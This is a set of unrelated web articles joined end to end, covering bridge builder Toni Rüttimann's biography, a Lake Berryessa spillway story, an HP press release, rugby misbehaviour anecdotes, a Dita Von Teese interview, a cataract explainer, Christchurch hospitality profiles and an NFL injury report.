Toni Rüttimann works independently alongside communities in need, using recycled materials and charging no fees.[1]
Companies contribute by donating their used material and local governments concede permits and help with transportation in recognition of the fact that the main effort is made by the population. No one asks for anything in return and the bridge belongs to the population who built it.[2]
The bridges are for use of pedestrians, pack animals, motorcycles, two-wheel-tractors – but not for cars.
In every country where Toni works, they build up a small team of national welders and looks for one “bridge-building partner”, to whom they teach their craft, and who in turn is able to perform maintenance duties on the bridges built.[3]
Toni has no home residence: they carry everything they need in two bags. One for their personal belongings, the other for their laptop computer and a few tools for their trade.[1][4]
In collaboration with local communities, they have built 760 bridges which serve two million people (as of August 22, 2017).[5]
Biography [ edit ]
Toni El Suizo and the bridge across the Aguarico River, built by the villagers
Beginnings in Ecuador [ edit ]
In 1987, two weeks before finishing high school at the Lyceum Alpinum Zuoz, Toni sees images on TV of the destruction caused by an earthquake in Ecuador. They decide to depart to South America on the night of their graduation, taking their personal savings and 9000 Swiss Francs donated by neighbours of Pontresina and the Engadine Valley.[1][3]
Once in the disaster area, in northeastern Ecuador, Toni meets a Dutch hydraulics engineer. With their technical help and assistance from the people of the Flor del Valle village, cut off from the outside by a tributary of the Aguarico river, they build a 52-meter long suspension bridge.[4]
After six months in Ecuador, Toni returns to Switzerland and begins their studies of civil engineering at the Federal Institute of Technology in Zurich. However, seven weeks later they decide to leave university and return to Ecuador to help immediately.[3][4]
Toni with Walter Yánez
In the Amazon region of Ecuador they put together a system for building bridges with the communities, requiring almost no money: the villagers bring stone and sand, the hard wood and their labour. Toni asks for donations of used wire rope from the oil drilling rigs in the region and for scrap pipe from the national oil company Petroecuador.[6]
From 1988 to 1990 they build six bridges. One of them, across the Aguarico river with a span of 264 meters, remains the longest of their bridges.[7] Toni el Suizo, as the Ecuadorian peasants named him, invented the “puentes de chatarra” (bridges made of scrap).[1]
In the oil town Lago Agrio of Ecuador, Toni finds a partner in Walter Yánez, a welder and mechanic.[4] Over the next seven years the two friends build another 82 bridges throughout Ecuador – always with the help of the local population – as well as 10 bridges in Colombia, in the wake of the 1994 Páez River earthquake at the Nevado del Huila volcano.[5]
From Ecuador to Central America [ edit ]
International bridge on the Lempa River, Honduras – El Salvador
By November 1998 Toni and Walter had built 99 bridges. That same month, with air-transport by the Ecuadorian Air Force, the two friends rush to help in Honduras, devastated by Hurricane Mitch, where they build another 33 bridges.[5] Other bridges follow in Costa Rica and Nicaragua, and also an international bridge between Honduras and El Salvador.[5][8]
In 2000 Toni receives pipes for 29 bridges in the state of Veracruz, Mexico from the steel pipe manufacturer Tamsa (Tubos de Acero de México SA, today TenarisTamsa).[9]
Pen Sopoan and Yin Sopul with Toni in Cambodia
Passage to Cambodia [ edit ]
During their visits to Switzerland Toni gives presentations in schools and universities. On one such occasion, in 2000, they meet a Cambodian refugee who asks them for help in the name of their people.[2][6]
In April 2001 they start working with two teams, with Walter Yánez in Mexico and with their two new Cambodian partners, Yin Sopul, mechanic, and Pen Sopoan, truck driver, both survivors of the genocide perpetrated by the Khmer Rouge.[4][6]
Paralyzed by Guillain–Barré syndrome [ edit ]
La Lima, Veracruz, Mexico
In April 2002 Toni falls ill with Guillain–Barré syndrome which destroys the myelin of the peripheral nerve system, paralyzing the muscles.[3]
Confined to a hospital bed and then admitted to the National Medical Rehabilitation Centre of the Princess Sirindhorn in Thailand, regardless, Toni never stops working. In the beginning with a pencil between their lips and the use of their two thumbs, they create a computer program for transforming the measurements sent by their colleagues from Mexico and Cambodia into clear and complete instructions, so that they can continue building bridges via remote control.[2][3]
This way, Walter completes 29 bridges in Mexico and then returns to Ecuador, where from 2003 on they continue to build bridges in their homeland only
Bridges in Vietnam, Laos, Myanmar, Indonesia [ edit ]
Bridge across national channel between Bac Lieu and Camau, Vietnam
After two years of rehabilitation Toni manages to walk again, and goes to Vietnam.
In the province of Ben Tre, with the help of Mai Son, retired Deputy Chairman of the Province and former Vietcong combatant, they create a third team. From 2004 to 2008 they build 58 bridges in the Vietnam Mekong Delta provinces of Ben Tre, Bac Lieu, Tra Vinh and Dong Thap.[10]
Pylone transport at Xe Xamxoy, Savannakhet, Laos
Toni continues into neighbouring Laos, where they had previously built three bridges with their Cambodian team in 2006. With Laotian truck driver Lanh and three welders they build 42 bridges between 2008 and 2010.[5]
Tamansari, Jember, Jawa Timu
Mid-2008 they go to Myanmar, which at the time was still under embargo by the United States of America and the European Union. In Yangon they present a letter and pictures of bridges built to a member of the government, and just four days later receives authorization from the capital, Nay Pyi Taw, allowing them to build bridges also in Myanmar.[5]
From that moment on, together with their Myanmar companion Aiklian, former artisanal gemstone digger, they build bridges throughout the entire national territory, while five welders prepare the bridge components in a government shipyard in Yangon.[5]
Aiklian and Toni
In late 2010 Toni el Suizo begins work in Indonesia. Tenaris donates the pipes from its Indonesian subsidiary, while the national government concedes the permits and offers a welding workshop outside of Jakarta. The Indonesian Navy and Army contribute most maritime transportation across this far-flung republic. Land transportation, however, is normally paid for by the community where the bridge is built.[1][3]
The Indonesian team consists of Suntana, former construction factory operator in Dubai, and four welders. From 2011 to March 2014, the team built 30 bridges on Java and 6 on Sulawesi.[5]
Supply chain [ edit ]
Pipes in Yangon donated by Tenaris
Since 2005 Tenaris, the world's largest producer of seamless steel pipe, has donated the pipes for the bridges Toni builds across the world – scrap and surplus pipes, sometimes even new – from their mills in Italy, Argentina, Brazil, Mexico, Colombia and Indonesia, including the long distance ocean freight to final destination.[2][3][4]
Bridgedeck with checkered steel plates
For an improved bridge deck made of steel, starting in 2004, checkered steel plates were contributed: in Vietnam and in Ecuador by the provincial governments, in Laos and Myanmar by the Argentinean mill of Ternium, one of Latin America's principal steel producers.[11]
Wire rope donated by the Swiss cable cars
Also in 2005, Toni begins using wire rope from the mountain cable cars of their home country. In Switzerland, the cable cars are required to change these cables frequently, due to the tight safety regulations imposed by the government.[3][12]
This way Toni receives cables of several kilometres in length, large diameter and good quality.[5]
Not all bridges built by Toni are still in service. In several places, especially in Ecuador and Cambodia, they have been replaced by vehicular bridges built by the government. In other places they have been rendered ugly due to the lack of maintenance, or even destroyed by natural disasters, as occurred in 2008 in the Páez River valley in Colombia.[13]
Bridge across the Aguarico River, Ecuador
Toni always works with local colleagues, so that interested communities can ask for their help for replacement of wire rope or other important repairs.
At present there have been no accidents of any significance during the construction of these bridges.[3] This is mainly attributable to the fact that local people are used to heavy labour and that strict safety rules and procedures have been followed during prefabrication and construction.[5]
Three special bridges [ edit ]
Bridge in Kachin State, Myanmar
Toni el Suizo has no favourite bridge, but in an interview with the Swiss magazine 'Schweizer Familie'[5] they remember three of them: one is the longest bridge they have built, with a span of 264 meters over the Aguarico river in Ecuador.[7]
International bridge on the Lempa River, Honduras – El Salvador
Then there is the international bridge between Honduras and El Salvador, that connects the communities of Mapulaca and Victoria, built by villagers who, in previous years, had fought against each other.[8][12]
Finally, a bridge built twice in Myanmar after being destroyed by KIA rebels (Kachin Independence Army) during guerrilla action. A monk, assisted by the most courageous men of the village, managed to rescue the bridge from the waters.[5]
Quotes [ edit ]
Carrying steel plate in Laos
"Some people need an entire earthquake to wake them up. I am one of these."[1]
The entire village helps
“My life is devoted to building bridges between the people on the planet. My dream is not so much to build bridges as such, but rather to help heal wounds, ease suffering, draw people together from all walks of life to create something that is beautiful, something that is good.”[12]
“The strength of these bridges comes from the hearts of the people who built them with their own bare hands as well as from the invisible network of people from all over the world who have given the tangible support needed to make this endeavour possible. This strength comes from the people involved. It is the strength of hope that comes when you decide to take your future into your own hands, to change life and shape the world around you.” [12]
Statistics [ edit ]
Statistics of bridges, updated August 22, 2017[14] Country Finished Population reached Cambodia 77 209 500 Indonesia 71 465 700 Laos 43 129 900 Myanmar 107 443 000 Vietnam 58 248 000 Southeast Asia 356 1 496 100 Argentine 2 3 500 Colombia 19 30 200 Costa Rica 14 8 000 Ecuador 301 364 900 El Salvador 1 12 500 Honduras 33 89 700 Mexico 30 22 400 Nicaragua 4 7 700 Latin America 404 538 900 Total 760 2 035 000
Awards [ edit ]
1997 23rd recipient of Adele Duttweiler Award
1999 recipient of Dr. J.E. Brandenberger Award
2000 Special Award of International Association for Bridge and Structural Engineering (IABSE) to recognize their original contributions to bridgebuilding in favour of the poor.
From 2001 onwards, Toni declines nominations for awards and prizes.
"I see myself on the level of the people I work with. [...] I prefer not to receive any awards and not to attend any gala dinners.” [5][14]
References [ edit ]
Even though earlier this year California was suffering from severe droughts, Mother Nature isn't one to shy away from change. Case in point: This past month the state has experience punishing rain that's led to flooding, evacuations and even a surprising phenomenon in the center of Lake Berryessa in Napa County.
You see, this body of water features a spillway that's shaped like a funnel and is 72-feet wide. It serves as a drain when lake water rise to more than 440 feet above sea level. So when water reaches these extreme levels, the excess water pours into the funnel and ends up in a creek 700 feet below the lake, instead of flooding nearby roads or homes. The results? A bathroom drain-like phenomenon that's quite a sight to behold.
WATCH: California's punishing rain has activated a huge drain in Lake Berryessa https://t.co/iQM7EIIT12 pic.twitter.com/ldGV2pblo8 — CBS This Morning (@CBSThisMorning) February 23, 2017
The spillway was designed to take in around 48,000 cubic feet of water per second, which is the same thing as draining half of an Olympic-sized pool in one second. Crazy, we know. And even though the spillway was designed specifically for this purpose, that doesn't mean it's common. In fact, it hasn't been used in over 10 years.
"Back in October, we were essentially half full," Roland Sanford, general manager of the Solano County Water Agency, told CBS Today. "This is the first time that the lake has been so low, and filled-up and spilled in one year." Clearly, Californians have been experiencing a range of weather. Experts say the spillway could keep flowing for several months.
Watch it in action:
h/t CBS News
PALO ALTO, Calif.--(BUSINESS WIRE)--HP (NYSE:HPQ) today announced that it has completed its evaluation of strategic alternatives for its Personal Systems Group (PSG) and has decided the unit will remain part of the company.
“HP objectively evaluated the strategic, financial and operational impact of spinning off PSG. It's clear after our analysis that keeping PSG within HP is right for customers and partners, right for shareholders, and right for employees,” said Meg Whitman, HP president and chief executive officer. “HP is committed to PSG, and together we are stronger.”
The strategic review involved subject-matter experts from across the businesses and functions. The data-driven evaluation revealed the depth of the integration that has occurred across key operations such as supply chain, IT and procurement. It also detailed the significant extent to which PSG contributes to HP's solutions portfolio and overall brand value. Finally, it also showed that the cost to recreate these in a standalone company outweighed any benefits of separation.
The outcome of this exercise reaffirms HP's model and the value for its customers and shareholders. PSG is a key component of HP's strategy to deliver higher value, lasting relationships with consumers, small- and medium-sized businesses and enterprise customers. The HP board of directors is confident that PSG can drive profitable growth as part of the larger entity and accelerate solutions from other parts of HP's business.
PSG has a history of innovation and technological leadership as well as an established record of industry-leading profitability. It is the No. 1 manufacturer of personal computers in the world with revenues totaling $40.7 billion for fiscal year 2010.
“As part of HP, PSG will continue to give customers and partners the advantages of product innovation and global scale across the industry's broadest portfolio of PCs, workstations and more,” said Todd Bradley, executive vice president, Personal Systems Group, HP. “We intend to make the leading PC business in the world even better.”
More information is available at www.hp.com/investor/PSG-Decision.
About HP
HP creates new possibilities for technology to have a meaningful impact on people, businesses, governments and society. The world's largest technology company, HP brings together a portfolio that spans printing, personal computing, software, services and IT infrastructure at the convergence of the cloud and connectivity, creating seamless, secure, context-aware experiences for a connected world. More information about HP is available at http://www.hp.com.
This news release contains forward-looking statements that involve risks, uncertainties and assumptions. If such risks or uncertainties materialize or such assumptions prove incorrect, the results of HP and its consolidated subsidiaries could differ materially from those expressed or implied by such forward-looking statements and assumptions. All statements other than statements of historical fact are statements that could be deemed forward-looking statements, including but not limited to statements of the plans, strategies and objectives of management for future operations, including execution of growth strategies, transformation initiatives and restructuring plans; any statements concerning expected development, performance or market share relating to products and services; any statements regarding anticipated operational and financial results; any statements of expectation or belief; and any statements of assumptions underlying any of the foregoing. Risks, uncertainties and assumptions include macroeconomic and geopolitical trends and events; the competitive pressures faced by HP's businesses; the development and transition of new products and services (and the enhancement of existing products and services) to meet customer needs and respond to emerging technological trends; the execution and performance of contracts by HP and its customers, suppliers and partners; the protection of HP's intellectual property assets, including intellectual property licensed from third parties; integration and other risks associated with business combination and investment transactions; the hiring and retention of key employees; expectations and assumptions relating to the execution and timing of growth strategies, transformation initiatives and restructuring plans; the resolution of pending investigations, claims and disputes; and other risks that are described in HP's Quarterly Report on Form 10-Q for the fiscal quarter ended July 31, 2011 and HP's other filings with the Securities and Exchange Commission, including but not limited to HP's Annual Report on Form 10-K for the fiscal year ended October 31, 2010. HP assumes no obligation and does not intend to update these forward-looking statements.
© 2011 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP shall not be liable for technical or editorial errors or omissions contained herein.
© Getty Images Enlarge Paddy Mayne - on tour they used to head to the nearest docks with the aim of picking a fight
Are the much-publicised antics of the likes of Gavin Henson, Danny Cipriani and James O'Connor a product of professionalism or have rugby players always behaved badly? Larry Medland, Penge
Rugby is actually far more disciplined since it turned professional, the difference being that the all-invasive media - traditional and social - now picks up on misdemeanours with glee. When players were amateurs they had more scope for high jinks and drinking; closer relationships with reporters meant that what went on tour usually did stay on tour.
A few incidents still saw the light of day - in 1982 Colin Smart was hospitalised after drinking a bottle of aftershave during a post-match banquet (in their defence they thought it was alcohol).
As far back as 1894 a group from New South Wales, playing in New Zealand, got so drunk they were asked to leave an official function and proceeded to abuse any hapless passer-by outside the venue.
During the Lions tour to South Africa in 1974, Willie John McBride recalled standing in their underpants, pipe in mouth, in a wrecked hotel foyer with a dozen Lions "out of their tree". Confronted by the hotel manager - dripping wet after being soaked following a previous attempted intervention when they tried to prevent the fire extinguishers being set off - McBride asked: "What seems to be the problem?" Later that night a player's bed was thrown out of a window.
The 1968 Lions held an impromptu bonfire on the tarmac at Kimberley airport after what was politely described as an "airborne cheese and wine party"
But perhaps the baddest of them all, and someone who would have kept the tabloids happy for months, was Irish lock Paddy Mayne. On the 1938 Lions tour of South Africa they delighted in crashing into team-mates' rooms in the middle of the night and destroying their furniture. For added value, with Welsh hooker Bunner Travers, they used to head to the docks with the sole intention on picking a fight. Their tour ended when they returned to the hotel with a dead antelope over their shoulder after going hunting in the early hours.
Download ESPN's new UK sport app, a fresh and powerful new way to follow your favourite UK sports news, scores and video.
© ESPN Sports Media Ltd
Dita Von Teese (née Heather Sweet) is a beautiful contradiction. She's a modern business person and brand with perfume and lingerie lines, who looks and dresses like they stepped out of a 1940s movie, and they were once married to shock-rocker Marilyn Manson. With 1.78 million followers on Twitter -- their Devonshire Rex cat Aleister Von Teese has 37,900 followers on Instagram -- Von Teese is completely self-made, and their dedication to vintage style has been copied by none other than pop star Katy Perry.
She's been described as the “queen of burlesque” for single-handedly reviving that retro art form, but they combine its retro aesthetic (and what could be retro ideas about femininity) with progressive ideas about sexuality and gender. Them “Strip, Strip Hooray!” touring burlesque show features drag king MC Murray Hill along with burlesque stars of all shapes and sizes. They have as many, if not more, female fans as they do male fans, because women love the pro-woman -- and yes, feminist -- message they send regarding women and power.
Von Teese brings this postmodern pastiche of old and new to relationships and sex as well, and they talked to International Business Times about what makes women and men appealing and seductive.
International Business Times: How would you describe your brand, Dita Von Teese?
Dita Von Teese: I like to call myself a "glambassador." I believe in glamour and sensuality and using these tools in everyday life, not just to put on a show for men. Sensuality, glamour, eroticism are things we should partake in because we enjoy them. Putting on lingerie, perfume, makeup -- if someone else reaps the benefits, that's great.
I know the power in the art of seduction. It's something you do because you believe in it. Sexiness is being confident and comfortable in your skin. An epic failure is trying too hard.
Photo: Marianne Rosenstiehl/Madame Magazine
IBTimes: How did you get into vintage style?
DVT: As a little girl, I remember vividly wanting to be a grown-up lady. To make decisions for myself and not be told what to do. I grew up being fascinated with the symbolic power of womanhood. Lingerie, perfume and makeup were the tools. It was a rite of passage to indulge in them.
I realized that my relationship with those things was different -- it was only later I really saw them as tools of seduction.
I worked in a lingerie store when I was 15. My relationship with it was symbolic of femininity -- something I wore because it was beautiful. But I remember my father was offended. I would wash and then hang lingerie to dry. It had a different meaning for them than it did for me.
When I released my maternity bra, not all women saw it the way I did, and some equated it with sexuality. For some of us, it's not always about wearing something for someone else. It might seem like how I look is only about sex, but I've had more backlash from men. “Do you have to wear that hat?” I've had boyfriends ask, or “Do you have to wear that corset?”
IBTimes: What do you like about vintage style? Burlesque?
DVT: I feel like I grew up with that era -- my mom watched those old movies. I couldn't relate to modern standards of beauty like the “Sports Illustrated,” type where there's lots of emphasis on natural beauty. I don't relate. I'm a boring looking girl with average features. I can be extraordinary with makeup, curled hair. I could be who I wanted to be. It offset my shyness, helped my confidence, and made people notice me.
Glamour is the art of creation. In the 1930s, '40s, '50s, those sex symbols were created from clothes, makeup, lingerie. Women were not natural, they were weaving a web of beauty....
I got into burlesque in the 1990s L.A. nightclub scene. I'd go to strip clubs and was fascinated. Everyone looked the same. I asked, What if I did it and did it differently? It'll either be a total failure or totally amazing. All the strippers were trying to be like each other. There wasn't a lot of variety. So, I worked in this strip club and wore vintage lingerie, had my hair in a “China doll” bob, wearing corsets. I thought, I might not get $1 from 20 guys, but I could get $20 from one guy. And then I realized what's different about you makes you valuable. Eventually fans of “Playboy,” fetish people and famous people helped me kick off my burlesque career.
Photo: Albert Sanchez
IBTimes: What concepts of love and sex from the past do you think we can learn from? In spite of your attachment to past glamour and values, you don't seem like a nostalgist, and you're certainly not conservative.
DVT: I'm old-fashioned in many ways. I don't make the first move. I'm not sexually aggressive. It's OK to be that way. There are thousands of years of programming there! I feel close to womanly things and things that are stereotypical. I like to be courted, have doors opened for me. I like to be allowed to be in my femininity. But also I'm independent and have power.
IBTimes: What do you think of the modern dating scene?
DVT: I was single a few times in the past couple years. I can't just get on Tinder, though, so I would go on a million blind dates. I'm adventurous and willing to put time in and pay my dues. These apps are great tools; they drum up energy. The women I know who use them end up making things happen. They're putting something out there in the world, and they end up dating. The women I know who say they would never use them -- they've been single for like 10 years.
As for sex or hooking up, I like to find out right away if there's sexual compatibility. I've noticed that if there's weekslong courtship and the sex isn't good, you're stuck with the drama. How do you tell them you didn't enjoy it? I gotta find out right away!
IBTimes: What's the most romantic thing anyone's ever done for you?
DVT: Grand gestures are great, but I like little gestures, too, like love letters written on paper. I had someone write my name in the snow on the top of a car and then took an artistic picture of it. Being asked to marry someone was romantic. But usually, I like the little gestures, like someone staying with me when I'm sick.
IBTimes: What's the most romantic thing you've ever done for someone?
DVT: I like to write letters from the heart. Giving something someone can hold. If I have something I want to say, I don't do it in email. I write perfumed letters on beautiful stationery, and I even use rose-scented ink. Or spray the letter with perfume I'm wearing.
IBTimes: What's the worst part of modern-day romance?
DVT: Getting divorced! And the financial side of divorce. Protecting my assets? Not romantic. Also, online dating seems so awkward. Sometimes when I look at profiles, I think, I hope this person finds someone!
IBTimes: What are the best ways to seduce someone?
DVT: For a woman, it's confidence. A woman who knows what they like. Confidence in their skin. They don't put down other women, and they align themselves with other women. It comes with age and experience. I hope younger women are cultivating their wit and wisdom. Sex and seduction are not just your looks, beauty and body.
For men, I'm attracted to men with a sense of humor when things get tough. In men, I also like elegance, kindness, men who take care of me when I need them. I also need hardworking men. They don't have to make a lot of money, but they need to be a hard worker.
IBTimes: What's your favorite romantic movie and book?
DVT: Movie -- David Lynch's “Wild at Heart.” Book -- Georges Bataille's “Story of the Eye,” an erotic surrealist novel about two people with intense fetishes who find and accept one another. The stories of Anaïs Nin and Henry Miller. People have always had carnal sexuality! It wasn't kinder, gentler times in the past.
IBTimes: Are you seeing someone now?
DVT: Yes, for the past year. Someone not into the limelight. A friend I'd overlooked. It's nice to be with your best friend.
What are cataracts?
A cataract is a small build-up of protein in the eye that, if left untreated, can cause blurred vision and eventual blindness. Cataracts can be present from birth, or can be brought on by old age or trauma to the eye.
For most adults, cataracts are completely reversible, but for children there's an urgency to treat them quickly. Cataracts can stop a child's eyes from developing properly, and if the cataracts are not treated in time the child's sight may never return, leaving them permanently blind.
Why is restoring sight so important?
For many people living in poor, rural communities, life without sight can be particularly difficult. If a blind parent needs to rely on their children, those children often miss out on an education. And if a blind child needs to rely on their parents, those parents often can't earn enough to feed themselves and their family.
Children and adults with visual impairments can be shunned by their family or community, leaving them with very little social interaction. Even the simplest journey can also be extremely dangerous, especially if they live near a lake or river.
Nick Inkster, Bink Bowler and Jed Joyce have thriving hospitality businesses in Christchurch and are dreaming big.
"Dreamt big, dreaming bigger" was the tagline Nick Inkster tapped out in 2014 to go with a photo of the penthouse apartment they had just acquired in Perth.
Then not yet 30, the former Christchurch builder had spent five years working hard in Western Australia's oil and gas industry to realise their penthouse apartment dream. By then, they also owned a string of other residential properties.
Yet, back in 2014, they still hadn't figured out where the "dreaming bigger" would take him. It turned out to be a one-way ticket home to Christchurch to set up a vintage-style bar in the central city.
DANIELLE COLVIN/STUFF Nick Inkster fell in love with the Old Government Building in Cathedral Square and sunk their money into it.
READ MORE:
* Christchurch gets a new bao bar
* Review: Little High Eatery
* Francesca Voza builds business in Wanaka
"I'd been coming back to Christchurch in my weeks off and seen how the central business district had disappeared. I came across the Old Government Building and just loved the site. It was about the only old building still standing in the city centre."
When an apartment in the building came up for sale, Nick grabbed it and then took the space downstairs for their bar, which they named O.G.B. in honour of the building. Rather than relying on a bank, Nick sank their own money into developing the bar and also persuaded a good friend from Christchurch with whom they had been working in Australia, Willem Lepoutre, to become a business partner.
DANIELLE COLVIN/STUFF A sign bearing the moniker of Nick's late Dad, Robin, is proudly displayed in the O.G.B. Bar.
Nick had harboured a goal of bar ownership ever since they and their twin brother, Leon, a plumber by trade, bought a house together in New Brighton as a pair of 20-year-olds.
"I built a bar in the backyard with taps and everything. I love entertaining people and I remember Dad saying they could see me owning a bar one day."
Sadly, Nick's father, Robin, died several years ago, so they never got to savour a beer at O.G.B., but a sign bearing their initials, salvaged from the old family home in Dallington, has pride of place behind the bar.
DANIELLE COLVIN/STUFF Owning a bar is a natural extension of Nick's love of entertaining people.
Nick was also inspired to start a business by their younger sister, Colette, who owned and operated a dance company, Studio 42 Performing Arts, from their early 20s. Their mum, Marianna Inkster, "has inspired me to make them proud – we are each other's biggest fans".
Before opening in May 2016, Nick devoted a year to establishing the bar, which has a 1920s-30s' look and feel. Nick once played the trumpet and their old instrument has joined an assemblage of vintage brass, including a huge sousaphone tuba all the way from London. Other curios in the bar include a phonograph and an old telephone.
"Everything works; nothing is a prop," says Nick, whose impressive ginger beard helps cement the bar's traditional vibe.
After seeing a 1950 photograph of an Austin 10 parked outside the Old Government Building, Nick persuaded an Amberley farmer to part with their old Austin so they could recreate the scene. It is an example of their meticulous attention to detail and the old car makes a great talking point for patrons and photo subject for tourists.
Staff uniforms, complete with braces and cheesecutter caps, are in step with how bar staff would have dressed back in the day. (Nick credits Kat Douglas, of the Grymmstone and Treacle Emporium, for helping establish the right look.) The dapper-suited and bowler-hatted doorman, Amosa Tualamali'i, is the face of O.G.B. for many.
Live music in a corner of the bar keeps the place humming until closing time.
DANIELLE COLVIN/STUFF On returning from working in Western Australian, Nick decided to invest in the heart of Christchurch city.
Nick admits to being guided by the expertise of others on the food and beverage side of the business. Executive bar tender Thomas Hanson and executive head chef Shawn McGowan are among those who have made a huge contribution.
Nick opened the bar with four staff members. Now they have a staff of 42 and an O.G.B. restaurant across the hall. They plan to open an old-fashioned barbershop and a cocktail lounge in the Old Government Building by the end of the year.
Another venture in the pipeline is a laundromat with a twist in New Regent St.
DANIELLE COLVIN/STUFF Nick persuaded an Amberley farmer to part with their Austin 10 so it could be parked outside the Old Government Building.
"I don't want to say too much about it yet, but suffice to say it will add a bit of theatre to wash day."
Nick never had any doubts that their big dream, with a bar at its heart, would pay off.
"Every great city has a cool old pub at its centre. We opened last May and we haven't shut our doors since. This city needs consistency and we're delivering it – we are the city's living room. This is for Christchurch."
COFFEE QUEST
Above the table where I meet Bink Bowler, founder of Victoria St's Black & White Coffee Cartel, Winnie the Pooh is sharing wall space with a sepia portrait from a junk shop.
The post-modern jumble is part of what makes the place so appealing, but it's the quality of coffee that really sets it apart.
DANIELLE COLVIN/STUFF Bink Bowler founded the Black & White Coffee Cartel in Christchurch.
Bink's passion for coffee – the art and craft of making it and the social culture associated with it – goes back to their teenage years. Something clicked one day when they saw a barista at work in a cafe in their hometown, Wanaka. They dropped out of Mt Aspiring College to learn the craft of a barista, initially doing it for nothing. Eventually, the cafe gave Bink a job.
After more than a decade, coffee remains central in their life.
Hospitality can be a tough business, but Bink and their team are upbeat about the direction Black & White is taking. The decision to install a micro-roaster – one of the new wave of smaller roasters out of John Robson's Coffee Workshop – put a rocket under this venture late in 2015.
DANIELLE COLVIN/STUFF The ability to roast and brew in-house has contributed to the Black and White Coffee Cartel's success.
"There's a chain involved with how coffee is priced," Bink says. "When the grower sells it to the buyer, there's a minimal price increase. When the buyer sells to the roaster, the price increase is again minimal. But when the roaster sells the coffee to a cafe, suddenly, there is a massive price increase. We have just culled that last bit of the supply chain."
Being able to both roast and brew in-house has fuelled the growth of Black & White. A slick franchise model has been developed and for every Black & White Coffee Cartel with a micro-roaster there will be a smaller-scale Black & White Coffee House. The first of these opened at The Crossing in May. The next Coffee Cartel and Coffee House combo is opening soon (Lichfield St in October 2017 and High St in February) under licensee Chris Meyer.
Reflecting on market trends, Bink says people today generally prefer smoother coffee that isn't too bitter, but they are sceptical about the fad for filter and siphon coffee.
DANIELLE COLVIN/STUFF Bink Bowler has a slick franchise model as a way to expand the reach of their coffee empire.
"What we have in New Zealand is a culture of medium-roast espresso coffee. We do beautiful flat whites and amazing lattes. We sell 300 flat whites a day here, versus 10 filter coffees."
It hasn't all been plain sailing for this talented 27-year-old, who admits he's had to overcome a few demons to achieve their dream.
After learning the ropes in Wanaka, they went straight to Wellington. At 18, they landed on their feet at Mojo Coffee, immersing themselves in a whole new world of coffee roasting, flavours and origins, before moving on to smaller-scale roaster Peoples Coffee.
Life started to come unstuck several years later at the award-winning Memphis Belle. Their first foray into cafe ownership ended on a sour note, with the venture descending into debt, worsened by Bink's heavy drinking at that time.
"People used to call me the King of Cuba Street. It was a massive social scene and I thought I was invincible."
Today, Bink's a different man. Sober for a start, but also older and a good deal wiser. Christchurch has provided a fresh start.
"Everything is black and white. The button-up man on our logo is our way of saying 'everything is clean and square'."
Their brother, Luke, is on board as a director (and head roaster), along with former All Black captain Reuben Thorne (who Bink met through the Angel Investment Network).
"Reuben is very experienced, calm and grounded, and I am also very grateful that they taught me how to pay tax," Bink says.
Both Bink and Luke have recently become fathers – yet another incentive to keep a steady hand on the tiller.
It seems the knocks have only made Bink stronger.
"You often find that the people who have failed in the past are the ones who end up doing really well in business. Failure is such a hard thing, but you learn so much from it."
I leave with a flat white in hand, and a very smooth cup it is, too.
ON A GELATO ROLL
Savouring the sweet taste of business success at just 19 years of age, Jed Joyce must surely qualify as one of the city's youngest rising stars of the hospitality scene.
DANIELLE COLVIN/STUFF Marketing and social media have played a huge part in driving the gelato business.
From a modest start in 2013, selling gelato part-time from a cart at the end of New Regent St, Jed graduated to permanent premises in the same street with the opening of the Rollickin Dessert Cafe in November 2016.
The original cart still operates at the Margaret Mahy Family Playground and a second cart covers weddings and other special events. In early September, Rollickin is due to notch up another level with additional premises at the Boys' High building in the Arts Centre, offering a sweet cabinet, gelato and coffee. This summer, at the height of the season, Jed will likely be employing about 25 full-time and casual staff.
It looks like an easy and natural progression from the outside, but, as Jed observes, it has taken more than three years to crank the business along to this point.
DANIELLE COLVIN/STUFF Jed Joyce is about to open a new gelato shop in the refurbished Arts Centre in Christchurch.
"In this time, I've focused hard at growing Rollickin, learning and jumping at any opportunity to see if they work."
Having self-employed parents undoubtedly provided a good grounding for Jed, who recalls growing up in a 24/7 business environment. Their mother, Tania Smith, is creatively geared and works in advertising, while their father, Paul Joyce, is part-owner of Mother Mary Construction.
Yet, the original impetus for setting up the cart was not a desire to launch a business career, but to raise money for a school trip to Vietnam through World Challenge.
DANIELLE COLVIN/STUFF With the New Regent St gelato shop going so well, Jed is opening a second branch. They also have two gelato carts.
"I did go on the trip; it was for four weeks and the group of us who went [from St Bede's College] had to plan everything ourselves."
Jed settled on a gelato cart as their fundraising vehicle, having had a summer job at the Berry Shop in Sawyers Arms Rd, selling fresh and frozen berries, along with sundaes and icecreams.
"I thought I could give something like that a go."
DANIELLE COLVIN/STUFF Jed has come a long way since they started selling gelato to fund a school trip to Vietnam.
They persuaded a horse-float builder to put a cart together, found an award-winning gelato supplier in Wellington – Gelissimo – and off they went. So successful was the cart that, after their return from Vietnam, Jed decided to keep it going as a summer holiday job and then as a way of earning money after school. While classmates planned university studies, Jed knew they had a business scoop to manage.
As demand began to outstrip what Gelissimo could supply, the move to permanent premises – with capacity to make gelato in-house – became inevitable.
"I'm lucky to have been mentored by the owner of Gelissimo, Graham Joe, who has been really supportive in helping us to nail recipes. A supplier of the Italian ingredients also came over from Australia to help us.
"We're still learning and improving; it's a work in progress."
It is no surprise to learn the most popular Rollickin flavour is chocolate, closely followed by salted caramel.
"We have 10 set flavours and two new ones that we rotate all the time. We love trying out crazy new flavour ideas."
The creative gelato-making team is led by Jed's girlfriend, Sorayya Sabbaghi.
Finding their feet in business has had its challenges – not the least being the tough job of convincing building owners to give a teenager a lease – but it helps that Jed is an astute learner with a keen eye for a bargain.
"Just about everything in here is secondhand," they say during our interview at the Rollickin Dessert Cafe. "That includes furniture and the equipment we use to make the gelato. I often go to auctions or the EcoShop in search of a bargain."
To keep the business humming in the off-season, Rollickin's New Regent St options include winter warmers such as mug cakes topped with gelato. In time, Jed plans to set up a proper dessert menu with a range of hot offerings.
"I don't know where I'll be in five or 10 years' time, but as long as I'm enjoying it, I will continue to grow this business and be a part of Christchurch."
The Arizona Cardinals were so much better on several fronts during their 31-27 exhibition victory over Oakland on Friday night.
The game could wind up being a disaster for them anyway.
Left tackle and especially quarterback are two of the most important positions on an NFL roster. Bad things happened for the Cardinals at both of those positions. Let's consider the potential ramifications:
Left tackle
Starter Levi Brown suffered a torn triceps that will keep them out at least three months and possibly for the full 2012 season, ESPN's Adam Schefter reported.
